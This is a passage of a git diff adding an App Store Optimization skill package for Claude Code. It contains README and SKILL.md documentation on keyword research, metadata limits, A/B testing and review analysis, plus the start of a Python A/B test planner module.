- `validate_character_limits()`: Ensure platform compliance
|
||||
- `calculate_keyword_density()`: Analyze keyword integration
|
||||
|
||||
### 3. competitor_analyzer.py
|
||||
**Purpose**: Analyzes competitor ASO strategies
|
||||
|
||||
**Key Functions**:
|
||||
- `analyze_competitor()`: Single competitor deep-dive
|
||||
- `compare_competitors()`: Multi-competitor analysis
|
||||
- `identify_gaps()`: Find competitive opportunities
|
||||
- `_calculate_competitive_strength()`: Score competitor ASO quality
|
||||
|
||||
### 4. aso_scorer.py
|
||||
**Purpose**: Calculates comprehensive ASO health score
|
||||
|
||||
**Key Functions**:
|
||||
- `calculate_overall_score()`: 0-100 ASO health score
|
||||
- `score_metadata_quality()`: Evaluate metadata optimization
|
||||
- `score_ratings_reviews()`: Assess rating quality and volume
|
||||
- `score_keyword_performance()`: Analyze ranking positions
|
||||
- `score_conversion_metrics()`: Evaluate conversion rates
|
||||
- `generate_recommendations()`: Prioritized improvement actions
|
||||
|
||||
### 5. ab_test_planner.py
|
||||
**Purpose**: Plans and tracks A/B tests for ASO elements
|
||||
|
||||
**Key Functions**:
|
||||
- `design_test()`: Create test hypothesis and structure
|
||||
- `calculate_sample_size()`: Determine required visitors
|
||||
- `calculate_significance()`: Assess statistical validity
|
||||
- `track_test_results()`: Monitor ongoing tests
|
||||
- `generate_test_report()`: Create comprehensive test reports
|
||||
|
||||
### 6. localization_helper.py
|
||||
**Purpose**: Manages multi-language ASO optimization
|
||||
|
||||
**Key Functions**:
|
||||
- `identify_target_markets()`: Prioritize localization markets
|
||||
- `translate_metadata()`: Adapt metadata for languages
|
||||
- `adapt_keywords()`: Cultural keyword adaptation
|
||||
- `validate_translations()`: Character limit validation
|
||||
- `calculate_localization_roi()`: Estimate investment returns
|
||||
|
||||
### 7. review_analyzer.py
|
||||
**Purpose**: Analyzes user reviews for actionable insights
|
||||
|
||||
**Key Functions**:
|
||||
- `analyze_sentiment()`: Calculate sentiment distribution
|
||||
- `extract_common_themes()`: Identify frequent topics
|
||||
- `identify_issues()`: Surface bugs and problems
|
||||
- `find_feature_requests()`: Extract desired features
|
||||
- `track_sentiment_trends()`: Monitor changes over time
|
||||
- `generate_response_templates()`: Create review responses
|
||||
|
||||
### 8. launch_checklist.py
|
||||
**Purpose**: Generates comprehensive launch and update checklists
|
||||
|
||||
**Key Functions**:
|
||||
- `generate_prelaunch_checklist()`: Complete submission validation
|
||||
- `validate_app_store_compliance()`: Check guidelines compliance
|
||||
- `create_update_plan()`: Plan update cadence
|
||||
- `optimize_launch_timing()`: Recommend launch dates
|
||||
- `plan_seasonal_campaigns()`: Identify seasonal opportunities
|
||||
|
||||
## Installation
|
||||
|
||||
### For Claude Code (Desktop/CLI)
|
||||
|
||||
#### Project-Level Installation
|
||||
```bash
|
||||
# Copy skill folder to project
|
||||
cp -r app-store-optimization /path/to/your/project/.claude/skills/
|
||||
|
||||
# Claude will auto-load the skill when working in this project
|
||||
```
|
||||
|
||||
#### User-Level Installation (Available in All Projects)
|
||||
```bash
|
||||
# Copy skill folder to user-level skills
|
||||
cp -r app-store-optimization ~/.claude/skills/
|
||||
|
||||
# Claude will load this skill in all your projects
|
||||
```
|
||||
|
||||
### For Claude Apps (Browser)
|
||||
|
||||
1. Use the `skill-creator` skill to import the skill
|
||||
2. Or manually import via Claude Apps interface
|
||||
|
||||
### Verification
|
||||
|
||||
To verify installation:
|
||||
```bash
|
||||
# Check if skill folder exists
|
||||
ls ~/.claude/skills/app-store-optimization/
|
||||
|
||||
# You should see:
|
||||
# SKILL.md
|
||||
# keyword_analyzer.py
|
||||
# metadata_optimizer.py
|
||||
# competitor_analyzer.py
|
||||
# aso_scorer.py
|
||||
# ab_test_planner.py
|
||||
# localization_helper.py
|
||||
# review_analyzer.py
|
||||
# launch_checklist.py
|
||||
# sample_input.json
|
||||
# expected_output.json
|
||||
# HOW_TO_USE.md
|
||||
# README.md
|
||||
```
|
||||
|
||||
## Usage Examples
|
||||
|
||||
### Example 1: Complete Keyword Research
|
||||
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you research keywords for my fitness app? I'm targeting people who want home workouts, yoga, and meal planning. Analyze top competitors like Nike Training Club and Peloton.
|
||||
```
|
||||
|
||||
**What Claude will do**:
|
||||
- Use `keyword_analyzer.py` to research keywords
|
||||
- Use `competitor_analyzer.py` to analyze Nike Training Club and Peloton
|
||||
- Provide prioritized keyword list with search volumes, competition levels
|
||||
- Identify gaps and long-tail opportunities
|
||||
- Recommend primary keywords for title and secondary keywords for description
|
||||
|
||||
### Example 2: Optimize App Store Metadata
|
||||
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Optimize my app's metadata for both Apple App Store and Google Play Store:
|
||||
- App: FitFlow
|
||||
- Category: Health & Fitness
|
||||
- Features: AI workout plans, nutrition tracking, progress photos
|
||||
- Keywords: fitness app, workout planner, home fitness
|
||||
```
|
||||
|
||||
**What Claude will do**:
|
||||
- Use `metadata_optimizer.py` to create optimized titles (multiple options)
|
||||
- Generate platform-specific descriptions (short and full)
|
||||
- Optimize Apple's 100-character keyword field
|
||||
- Validate all character limits
|
||||
- Calculate keyword density
|
||||
- Provide before/after comparison
|
||||
|
||||
### Example 3: Calculate ASO Health Score
|
||||
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Calculate my app's ASO score:
|
||||
- Average rating: 4.3 stars (8,200 ratings)
|
||||
- Keywords in top 10: 4
|
||||
- Keywords in top 50: 15
|
||||
- Conversion rate: 3.8%
|
||||
- Title: "FitFlow - Home Workouts"
|
||||
- Description: 1,500 characters with 3 keyword mentions
|
||||
```
|
||||
|
||||
**What Claude will do**:
|
||||
- Use `aso_scorer.py` to calculate overall score (0-100)
|
||||
- Break down by category (Metadata: X/25, Ratings: X/25, Keywords: X/25, Conversion: X/25)
|
||||
- Identify strengths and weaknesses
|
||||
- Generate prioritized recommendations
|
||||
- Estimate impact of improvements
|
||||
|
||||
### Example 4: A/B Test Planning
|
||||
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. I want to A/B test my app icon. My current conversion rate is 4.2%. How many visitors do I need and how long should I run the test?
|
||||
```
|
||||
|
||||
**What Claude will do**:
|
||||
- Use `ab_test_planner.py` to design test
|
||||
- Calculate required sample size (based on minimum detectable effect)
|
||||
- Estimate test duration for low/medium/high traffic scenarios
|
||||
- Provide test structure and success metrics
|
||||
- Explain how to analyze results
|
||||
|
||||
### Example 5: Review Sentiment Analysis
|
||||
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Analyze my last 500 reviews and tell me:
|
||||
- Overall sentiment
|
||||
- Most common complaints
|
||||
- Top feature requests
|
||||
- Bugs needing immediate fixes
|
||||
```
|
||||
|
||||
**What Claude will do**:
|
||||
- Use `review_analyzer.py` to process reviews
|
||||
- Calculate sentiment distribution
|
||||
- Extract common themes
|
||||
- Identify and prioritize issues
|
||||
- Cluster feature requests
|
||||
- Generate response templates
|
||||
|
||||
### Example 6: Pre-Launch Checklist
|
||||
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Generate a complete pre-launch checklist for both app stores. My launch date is March 15, 2026.
|
||||
```
|
||||
|
||||
**What Claude will do**:
|
||||
- Use `launch_checklist.py` to generate checklists
|
||||
- Create Apple App Store checklist (metadata, assets, technical, legal)
|
||||
- Create Google Play Store checklist (metadata, assets, technical, legal)
|
||||
- Add universal checklist (marketing, QA, support)
|
||||
- Generate timeline with milestones
|
||||
- Calculate completion percentage
|
||||
|
||||
## Best Practices
|
||||
|
||||
### Keyword Research
|
||||
1. Start with 20-30 seed keywords
|
||||
2. Analyze top 5 competitors in your category
|
||||
3. Balance high-volume and long-tail keywords
|
||||
4. Prioritize relevance over search volume
|
||||
5. Update keyword research quarterly
|
||||
|
||||
### Metadata Optimization
|
||||
1. Front-load keywords in title (first 15 characters most important)
|
||||
2. Use every available character (don't waste space)
|
||||
3. Write for humans first, search engines second
|
||||
4. A/B test major changes before committing
|
||||
5. Update descriptions with each major release
|
||||
|
||||
### A/B Testing
|
||||
1. Test one element at a time (icon vs. screenshots vs. title)
|
||||
2. Run tests to statistical significance (90%+ confidence)
|
||||
3. Test high-impact elements first (icon has biggest impact)
|
||||
4. Allow sufficient duration (at least 1 week, preferably 2-3)
|
||||
5. Document learnings for future tests
|
||||
|
||||
### Localization
|
||||
1. Start with top 5 revenue markets (US, China, Japan, Germany, UK)
|
||||
2. Use professional translators, not machine translation
|
||||
3. Test translations with native speakers
|
||||
4. Adapt keywords for cultural context
|
||||
5. Monitor ROI by market
|
||||
|
||||
### Review Management
|
||||
1. Respond to reviews within 24-48 hours
|
||||
2. Always be professional, even with negative reviews
|
||||
3. Address specific issues raised
|
||||
4. Thank users for positive feedback
|
||||
5. Use insights to prioritize product improvements
|
||||
|
||||
## Technical Requirements
|
||||
|
||||
- **Python**: 3.7+ (for Python modules)
|
||||
- **Platform Support**: Apple App Store, Google Play Store
|
||||
- **Data Formats**: JSON input/output
|
||||
- **Dependencies**: Standard library only (no external packages required)
|
||||
|
||||
## Limitations
|
||||
|
||||
### Data Dependencies
|
||||
- Keyword search volumes are estimates (no official Apple/Google data)
|
||||
- Competitor data limited to publicly available information
|
||||
- Review analysis requires access to public reviews
|
||||
- Historical data may not be available for new apps
|
||||
|
||||
### Platform Constraints
|
||||
- Apple: Metadata changes require app submission (except Promotional Text)
|
||||
- Google: Metadata changes take 1-2 hours to index
|
||||
- A/B testing requires significant traffic for statistical significance
|
||||
- Store algorithms are proprietary and change without notice
|
||||
|
||||
### Scope
|
||||
- Does not include paid user acquisition (Apple Search Ads, Google Ads)
|
||||
- Does not cover in-app analytics implementation
|
||||
- Does not handle technical app development
|
||||
- Focuses on organic discovery and conversion optimization
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Issue: Python modules not found
|
||||
**Solution**: Ensure all .py files are in the same directory as SKILL.md
|
||||
|
||||
### Issue: Character limit validation failing
|
||||
**Solution**: Check that you're using the correct platform ('apple' or 'google')
|
||||
|
||||
### Issue: Keyword research returning limited results
|
||||
**Solution**: Provide more context about your app, features, and target audience
|
||||
|
||||
### Issue: ASO score seems inaccurate
|
||||
**Solution**: Ensure you're providing accurate metrics (ratings, keyword rankings, conversion rate)
|
||||
|
||||
## Version History
|
||||
|
||||
### Version 1.0.0 (November 7, 2025)
|
||||
- Initial release
|
||||
- 8 Python modules with comprehensive ASO capabilities
|
||||
- Support for both Apple App Store and Google Play Store
|
||||
- Keyword research, metadata optimization, competitor analysis
|
||||
- ASO scoring, A/B testing, localization, review analysis
|
||||
- Launch planning and seasonal campaign tools
|
||||
|
||||
## Support & Feedback
|
||||
|
||||
This skill is designed to help app developers and marketers succeed in competitive app marketplaces. For the best results:
|
||||
|
||||
1. Provide detailed context about your app
|
||||
2. Include specific metrics when available
|
||||
3. Ask follow-up questions for clarification
|
||||
4. Iterate based on results
|
||||
|
||||
## Credits
|
||||
|
||||
Developed by Claude Skills Factory
|
||||
Based on industry-standard ASO best practices
|
||||
Platform requirements current as of November 2025
|
||||
|
||||
## License
|
||||
|
||||
This skill is provided as-is for use with Claude Code and Claude Apps. Customize and extend as needed for your specific use cases.
|
||||
|
||||
---
|
||||
|
||||
**Ready to optimize your app?** Start with keyword research, then move to metadata optimization, and finally implement A/B testing for continuous improvement. The skill handles everything from pre-launch planning to ongoing optimization.
|
||||
|
||||
For detailed usage examples, see [HOW_TO_USE.md](HOW_TO_USE.md).
|
||||
409
packages/llm/skills/app-store-optimization/SKILL.md
Normal file
409
packages/llm/skills/app-store-optimization/SKILL.md
Normal file
@ -0,0 +1,409 @@
|
||||
---
|
||||
name: app-store-optimization
|
||||
description: "Complete App Store Optimization (ASO) toolkit for researching, optimizing, and tracking mobile app performance on Apple App Store and Google Play Store"
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# App Store Optimization (ASO) Skill
|
||||
|
||||
This comprehensive skill provides complete ASO capabilities for successfully launching and optimizing mobile applications on the Apple App Store and Google Play Store.
|
||||
|
||||
## Capabilities
|
||||
|
||||
### Research & Analysis
|
||||
- **Keyword Research**: Analyze keyword volume, competition, and relevance for app discovery
|
||||
- **Competitor Analysis**: Deep-dive into top-performing apps in your category
|
||||
- **Market Trend Analysis**: Identify emerging trends and opportunities in your app category
|
||||
- **Review Sentiment Analysis**: Extract insights from user reviews to identify strengths and issues
|
||||
- **Category Analysis**: Evaluate optimal category and subcategory placement strategies
|
||||
|
||||
### Metadata Optimization
|
||||
- **Title Optimization**: Create compelling titles with optimal keyword placement (platform-specific character limits)
|
||||
- **Description Optimization**: Craft both short and full descriptions that convert and rank
|
||||
- **Subtitle/Promotional Text**: Optimize Apple-specific subtitle (30 chars) and promotional text (170 chars)
|
||||
- **Keyword Field**: Maximize Apple's 100-character keyword field with strategic selection
|
||||
- **Category Selection**: Data-driven recommendations for primary and secondary categories
|
||||
- **Icon Best Practices**: Guidelines for designing high-converting app icons
|
||||
- **Screenshot Optimization**: Strategies for creating screenshots that drive installs
|
||||
- **Preview Video**: Best practices for app preview videos
|
||||
- **Localization**: Multi-language optimization strategies for global reach
|
||||
|
||||
### Conversion Optimization
|
||||
- **A/B Testing Framework**: Plan and track metadata experiments for continuous improvement
|
||||
- **Visual Asset Testing**: Test icons, screenshots, and videos for maximum conversion
|
||||
- **Store Listing Optimization**: Comprehensive page optimization for impression-to-install conversion
|
||||
- **Call-to-Action**: Optimize CTAs in descriptions and promotional materials
|
||||
|
||||
### Rating & Review Management
|
||||
- **Review Monitoring**: Track and analyze user reviews for actionable insights
|
||||
- **Response Strategies**: Templates and best practices for responding to reviews
|
||||
- **Rating Improvement**: Tactical approaches to improve app ratings organically
|
||||
- **Issue Identification**: Surface common problems and feature requests from reviews
|
||||
|
||||
### Launch & Update Strategies
|
||||
- **Pre-Launch Checklist**: Complete validation before submitting to stores
|
||||
- **Launch Timing**: Optimize release timing for maximum visibility and downloads
|
||||
- **Update Cadence**: Plan optimal update frequency and feature rollouts
|
||||
- **Feature Announcements**: Craft "What's New" sections that re-engage users
|
||||
- **Seasonal Optimization**: Leverage seasonal trends and events
|
||||
|
||||
### Analytics & Tracking
|
||||
- **ASO Score**: Calculate overall ASO health score across multiple factors
|
||||
- **Keyword Rankings**: Track keyword position changes over time
|
||||
- **Conversion Metrics**: Monitor impression-to-install conversion rates
|
||||
- **Download Velocity**: Track download trends and momentum
|
||||
- **Performance Benchmarking**: Compare against category averages and competitors
|
||||
|
||||
### Platform-Specific Requirements
|
||||
- **Apple App Store**:
|
||||
- Title: 30 characters
|
||||
- Subtitle: 30 characters
|
||||
- Promotional Text: 170 characters (editable without app update)
|
||||
- Description: 4,000 characters
|
||||
- Keywords: 100 characters (comma-separated, no spaces)
|
||||
- What's New: 4,000 characters
|
||||
- **Google Play Store**:
|
||||
- Title: 50 characters (formerly 30, increased in 2021)
|
||||
- Short Description: 80 characters
|
||||
- Full Description: 4,000 characters
|
||||
- No separate keyword field (keywords extracted from title and description)
|
||||
|
||||
## Input Requirements
|
||||
|
||||
### Keyword Research
|
||||
```json
|
||||
{
|
||||
"app_name": "MyApp",
|
||||
"category": "Productivity",
|
||||
"target_keywords": ["task manager", "productivity", "todo list"],
|
||||
"competitors": ["Todoist", "Any.do", "Microsoft To Do"],
|
||||
"language": "en-US"
|
||||
}
|
||||
```
|
||||
|
||||
### Metadata Optimization
|
||||
```json
|
||||
{
|
||||
"platform": "apple" | "google",
|
||||
"app_info": {
|
||||
"name": "MyApp",
|
||||
"category": "Productivity",
|
||||
"target_audience": "Professionals aged 25-45",
|
||||
"key_features": ["Task management", "Team collaboration", "AI assistance"],
|
||||
"unique_value": "AI-powered task prioritization"
|
||||
},
|
||||
"current_metadata": {
|
||||
"title": "Current Title",
|
||||
"subtitle": "Current Subtitle",
|
||||
"description": "Current description..."
|
||||
},
|
||||
"target_keywords": ["productivity", "task manager", "todo"]
|
||||
}
|
||||
```
|
||||
|
||||
### Review Analysis
|
||||
```json
|
||||
{
|
||||
"app_id": "com.myapp.app",
|
||||
"platform": "apple" | "google",
|
||||
"date_range": "last_30_days" | "last_90_days" | "all_time",
|
||||
"rating_filter": [1, 2, 3, 4, 5],
|
||||
"language": "en"
|
||||
}
|
||||
```
|
||||
|
||||
### ASO Score Calculation
|
||||
```json
|
||||
{
|
||||
"metadata": {
|
||||
"title_quality": 0.8,
|
||||
"description_quality": 0.7,
|
||||
"keyword_density": 0.6
|
||||
},
|
||||
"ratings": {
|
||||
"average_rating": 4.5,
|
||||
"total_ratings": 15000
|
||||
},
|
||||
"conversion": {
|
||||
"impression_to_install": 0.05
|
||||
},
|
||||
"keyword_rankings": {
|
||||
"top_10": 5,
|
||||
"top_50": 12,
|
||||
"top_100": 18
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Output Formats
|
||||
|
||||
### Keyword Research Report
|
||||
- List of recommended keywords with search volume estimates
|
||||
- Competition level analysis (low/medium/high)
|
||||
- Relevance scores for each keyword
|
||||
- Strategic recommendations for primary vs. secondary keywords
|
||||
- Long-tail keyword opportunities
|
||||
|
||||
### Optimized Metadata Package
|
||||
- Platform-specific title (with character count validation)
|
||||
- Subtitle/promotional text (Apple)
|
||||
- Short description (Google)
|
||||
- Full description (both platforms)
|
||||
- Keyword field (Apple - 100 chars)
|
||||
- Character count validation for all fields
|
||||
- Keyword density analysis
|
||||
- Before/after comparison
|
||||
|
||||
### Competitor Analysis Report
|
||||
- Top 10 competitors in category
|
||||
- Their metadata strategies
|
||||
- Keyword overlap analysis
|
||||
- Visual asset assessment
|
||||
- Rating and review volume comparison
|
||||
- Identified gaps and opportunities
|
||||
|
||||
### ASO Health Score
|
||||
- Overall score (0-100)
|
||||
- Category breakdown:
|
||||
- Metadata Quality (0-25)
|
||||
- Ratings & Reviews (0-25)
|
||||
- Keyword Performance (0-25)
|
||||
- Conversion Metrics (0-25)
|
||||
- Specific improvement recommendations
|
||||
- Priority action items
|
||||
|
||||
### A/B Test Plan
|
||||
- Hypothesis and test variables
|
||||
- Test duration recommendations
|
||||
- Success metrics definition
|
||||
- Sample size calculations
|
||||
- Statistical significance thresholds
|
||||
|
||||
### Launch Checklist
|
||||
- Pre-submission validation (all required assets, metadata)
|
||||
- Store compliance verification
|
||||
- Testing checklist (devices, OS versions)
|
||||
- Marketing preparation items
|
||||
- Post-launch monitoring plan
|
||||
|
||||
## How to Use
|
||||
|
||||
### Keyword Research
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you research the best keywords for a productivity app targeting professionals? Focus on keywords with good search volume but lower competition.
|
||||
```
|
||||
|
||||
### Optimize App Store Listing
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you optimize my app's metadata for the Apple App Store? Here's my current listing: [provide current metadata]. I want to rank for "task management" and "productivity tools".
|
||||
```
|
||||
|
||||
### Analyze Competitor Strategy
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze the ASO strategies of Todoist, Any.do, and Microsoft To Do? I want to understand what they're doing well and where there are opportunities.
|
||||
```
|
||||
|
||||
### Review Sentiment Analysis
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze recent reviews for my app (com.myapp.ios) and identify the most common user complaints and feature requests?
|
||||
```
|
||||
|
||||
### Calculate ASO Score
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you calculate my app's overall ASO health score and provide specific recommendations for improvement?
|
||||
```
|
||||
|
||||
### Plan A/B Test
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. I want to A/B test my app icon and first screenshot. Can you help me design the test and determine how long to run it?
|
||||
```
|
||||
|
||||
### Pre-Launch Checklist
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you generate a comprehensive pre-launch checklist for submitting my app to both Apple App Store and Google Play Store?
|
||||
```
|
||||
|
||||
## Scripts
|
||||
|
||||
### keyword_analyzer.py
|
||||
Analyzes keywords for search volume, competition, and relevance. Provides strategic recommendations for primary and secondary keywords.
|
||||
|
||||
**Key Functions:**
|
||||
- `analyze_keyword()`: Analyze single keyword metrics
|
||||
- `compare_keywords()`: Compare multiple keywords
|
||||
- `find_long_tail()`: Discover long-tail keyword opportunities
|
||||
- `calculate_keyword_difficulty()`: Assess competition level
|
||||
|
||||
### metadata_optimizer.py
|
||||
Optimizes titles, descriptions, and keyword fields with platform-specific character limit validation.
|
||||
|
||||
**Key Functions:**
|
||||
- `optimize_title()`: Create compelling, keyword-rich titles
|
||||
- `optimize_description()`: Generate conversion-focused descriptions
|
||||
- `optimize_keyword_field()`: Maximize Apple's 100-char keyword field
|
||||
- `validate_character_limits()`: Ensure compliance with platform limits
|
||||
- `calculate_keyword_density()`: Analyze keyword usage in metadata
|
||||
|
||||
### competitor_analyzer.py
|
||||
Analyzes top competitors' ASO strategies and identifies opportunities.
|
||||
|
||||
**Key Functions:**
|
||||
- `get_top_competitors()`: Identify category leaders
|
||||
- `analyze_competitor_metadata()`: Extract and analyze competitor keywords
|
||||
- `compare_visual_assets()`: Evaluate icons and screenshots
|
||||
- `identify_gaps()`: Find competitive opportunities
|
||||
|
||||
### aso_scorer.py
|
||||
Calculates comprehensive ASO health score across multiple dimensions.
|
||||
|
||||
**Key Functions:**
|
||||
- `calculate_overall_score()`: Compute 0-100 ASO score
|
||||
- `score_metadata_quality()`: Evaluate title, description, keywords
|
||||
- `score_ratings_reviews()`: Assess rating quality and volume
|
||||
- `score_keyword_performance()`: Analyze ranking positions
|
||||
- `score_conversion_metrics()`: Evaluate impression-to-install rates
|
||||
- `generate_recommendations()`: Provide prioritized action items
|
||||
|
||||
### ab_test_planner.py
|
||||
Plans and tracks A/B tests for metadata and visual assets.
|
||||
|
||||
**Key Functions:**
|
||||
- `design_test()`: Create test hypothesis and variables
|
||||
- `calculate_sample_size()`: Determine required test duration
|
||||
- `calculate_significance()`: Assess statistical significance
|
||||
- `track_results()`: Monitor test performance
|
||||
- `generate_report()`: Summarize test outcomes
|
||||
|
||||
### localization_helper.py
|
||||
Manages multi-language ASO optimization strategies.
|
||||
|
||||
**Key Functions:**
|
||||
- `identify_target_markets()`: Recommend localization priorities
|
||||
- `translate_metadata()`: Generate localized metadata
|
||||
- `adapt_keywords()`: Research locale-specific keywords
|
||||
- `validate_translations()`: Check character limits per language
|
||||
- `calculate_localization_roi()`: Estimate impact of localization
|
||||
|
||||
### review_analyzer.py
|
||||
Analyzes user reviews for sentiment, issues, and feature requests.
|
||||
|
||||
**Key Functions:**
|
||||
- `analyze_sentiment()`: Calculate positive/negative/neutral ratios
|
||||
- `extract_common_themes()`: Identify frequently mentioned topics
|
||||
- `identify_issues()`: Surface bugs and user complaints
|
||||
- `find_feature_requests()`: Extract desired features
|
||||
- `track_sentiment_trends()`: Monitor sentiment over time
|
||||
- `generate_response_templates()`: Create review response drafts
|
||||
|
||||
### launch_checklist.py
|
||||
Generates comprehensive pre-launch and update checklists.
|
||||
|
||||
**Key Functions:**
|
||||
- `generate_prelaunch_checklist()`: Complete submission validation
|
||||
- `validate_app_store_compliance()`: Check Apple guidelines
|
||||
- `validate_play_store_compliance()`: Check Google policies
|
||||
- `create_update_plan()`: Plan update cadence and features
|
||||
- `optimize_launch_timing()`: Recommend release dates
|
||||
- `plan_seasonal_campaigns()`: Identify seasonal opportunities
|
||||
|
||||
## Best Practices
|
||||
|
||||
### Keyword Research
|
||||
1. **Volume vs. Competition**: Balance high-volume keywords with achievable rankings
|
||||
2. **Relevance First**: Only target keywords genuinely relevant to your app
|
||||
3. **Long-Tail Strategy**: Include 3-4 word phrases with lower competition
|
||||
4. **Continuous Research**: Keyword trends change—research quarterly
|
||||
5. **Competitor Keywords**: Don't copy blindly; ensure relevance to your features
|
||||
|
||||
### Metadata Optimization
|
||||
1. **Front-Load Keywords**: Place most important keywords early in title/description
|
||||
2. **Natural Language**: Write for humans first, SEO second
|
||||
3. **Feature Benefits**: Focus on user benefits, not just features
|
||||
4. **A/B Test Everything**: Test titles, descriptions, screenshots systematically
|
||||
5. **Update Regularly**: Refresh metadata every major update
|
||||
6. **Character Limits**: Use every character—don't waste valuable space
|
||||
7. **Apple Keyword Field**: No plurals, duplicates, or spaces between commas
|
||||
|
||||
### Visual Assets
|
||||
1. **Icon**: Must be recognizable at small sizes (60x60px)
|
||||
2. **Screenshots**: First 2-3 are critical—most users don't scroll
|
||||
3. **Captions**: Use screenshot captions to tell your value story
|
||||
4. **Consistency**: Match visual style to app design
|
||||
5. **A/B Test Icons**: Icon is the single most important visual element
|
||||
|
||||
### Reviews & Ratings
|
||||
1. **Respond Quickly**: Reply to reviews within 24-48 hours
|
||||
2. **Professional Tone**: Always courteous, even with negative reviews
|
||||
3. **Address Issues**: Show you're actively fixing reported problems
|
||||
4. **Thank Supporters**: Acknowledge positive reviews
|
||||
5. **Prompt Strategically**: Ask for ratings after positive experiences
|
||||
|
||||
### Launch Strategy
|
||||
1. **Soft Launch**: Consider launching in smaller markets first
|
||||
2. **PR Timing**: Coordinate press coverage with launch
|
||||
3. **Update Frequently**: Initial updates signal active development
|
||||
4. **Monitor Closely**: Track metrics daily for first 2 weeks
|
||||
5. **Iterate Quickly**: Fix critical issues immediately
|
||||
|
||||
### Localization
|
||||
1. **Prioritize Markets**: Start with English, Spanish, Chinese, French, German
|
||||
2. **Native Speakers**: Use professional translators, not machine translation
|
||||
3. **Cultural Adaptation**: Some features resonate differently by culture
|
||||
4. **Test Locally**: Have native speakers review before publishing
|
||||
5. **Measure ROI**: Track downloads by locale to assess impact
|
||||
|
||||
## Limitations
|
||||
|
||||
### Data Dependencies
|
||||
- Keyword search volume estimates are approximate (no official data from Apple/Google)
|
||||
- Competitor data may be incomplete for private apps
|
||||
- Review analysis limited to public reviews (can't access private feedback)
|
||||
- Historical data may not be available for new apps
|
||||
|
||||
### Platform Constraints
|
||||
- Apple App Store keyword changes require app submission (except Promotional Text)
|
||||
- Google Play Store metadata changes take 1-2 hours to index
|
||||
- A/B testing requires significant traffic for statistical significance
|
||||
- Store algorithms are proprietary and change without notice
|
||||
|
||||
### Industry Variability
|
||||
- ASO benchmarks vary significantly by category (games vs. utilities)
|
||||
- Seasonality affects different categories differently
|
||||
- Geographic markets have different competitive landscapes
|
||||
- Cultural preferences impact what works in different countries
|
||||
|
||||
### Scope Boundaries
|
||||
- Does not include paid user acquisition strategies (Apple Search Ads, Google Ads)
|
||||
- Does not cover app development or UI/UX optimization
|
||||
- Does not include app analytics implementation (use Firebase, Mixpanel, etc.)
|
||||
- Does not handle app submission technical issues (provisioning profiles, certificates)
|
||||
|
||||
### When NOT to Use This Skill
|
||||
- For web apps (different SEO strategies apply)
|
||||
- For enterprise apps not in public stores
|
||||
- For apps in beta/TestFlight only
|
||||
- If you need paid advertising strategies (use marketing skills instead)
|
||||
|
||||
## Integration with Other Skills
|
||||
|
||||
This skill works well with:
|
||||
- **Content Strategy Skills**: For creating app descriptions and marketing copy
|
||||
- **Analytics Skills**: For analyzing download and engagement data
|
||||
- **Localization Skills**: For managing multi-language content
|
||||
- **Design Skills**: For creating optimized visual assets
|
||||
- **Marketing Skills**: For coordinating broader launch campaigns
|
||||
|
||||
## Version & Updates
|
||||
|
||||
This skill is based on current Apple App Store and Google Play Store requirements as of November 2025. Store policies and best practices evolve—verify current requirements before major launches.
|
||||
|
||||
**Key Updates to Monitor:**
|
||||
- Apple App Store Connect updates (apple.com/app-store/review/guidelines)
|
||||
- Google Play Console updates (play.google.com/console/about/guides/releasewithconfidence)
|
||||
- iOS/Android version adoption rates (affects device testing)
|
||||
- Store algorithm changes (follow ASO blogs and communities)
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
662
packages/llm/skills/app-store-optimization/ab_test_planner.py
Normal file
662
packages/llm/skills/app-store-optimization/ab_test_planner.py
Normal file
@ -0,0 +1,662 @@
|
||||
"""
|
||||
A/B testing module for App Store Optimization.
|
||||
Plans and tracks A/B tests for metadata and visual assets.
|
||||
"""
|
||||
|
||||
from typing import Dict, List, Any, Optional
|
||||
import math
|
||||
|
||||
|
||||
class ABTestPlanner:
|
||||
"""Plans and tracks A/B tests for ASO elements."""
|
||||
|
||||
# Minimum detectable effect sizes (conservative estimates)
|
||||
MIN_EFFECT_SIZES = {
|
||||
'icon': 0.10, # 10% conversion improvement
|
||||
'screenshot': 0.08, # 8% conversion improvement
|
||||
'title': 0.05, # 5% conversion improvement
|
||||
'description': 0.03 # 3% conversion improvement
|
||||
}
|
||||
|
||||
# Statistical confidence levels
|
||||
CONFIDENCE_LEVELS = {
|
||||
'high': 0.95, # 95% confidence
|
||||
'standard': 0.90, # 90% confidence
|
||||
'exploratory': 0.80 # 80% confidence
|
||||
}
|
||||
|
||||
def __init__(self):
|
||||
"""Initialize A/B test planner."""
|
||||
self.active_tests = []
|
||||
|
||||
def design_test(
|
||||
self,
|
||||
test_type: str,
|
||||
variant_a: Dict[str, Any],
|
||||
variant_b: Dict[str, Any],
|
||||
hypothesis: str,
|
||||
success_metric: str = 'conversion_rate'
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Design an A/B test with hypothesis and variables.
|
||||
|
||||
Args:
|
||||
test_type: Type of test ('icon', 'screenshot', 'title', 'description')
|
||||
variant_a: Control variant details
|
||||
variant_b: Test variant details
|
||||
hypothesis: Expected outcome hypothesis
|
||||
success_metric: Metric to optimize
|
||||
|
||||
Returns:
|
||||
Test design with configuration
|
||||
"""
|
||||
test_design = {
|
||||
'test_id': self._generate_test_id(test_type),
|
||||
'test_type': test_type,
|
||||
'hypothesis': hypothesis,
|
||||
'variants': {
|
||||
'a': {
|
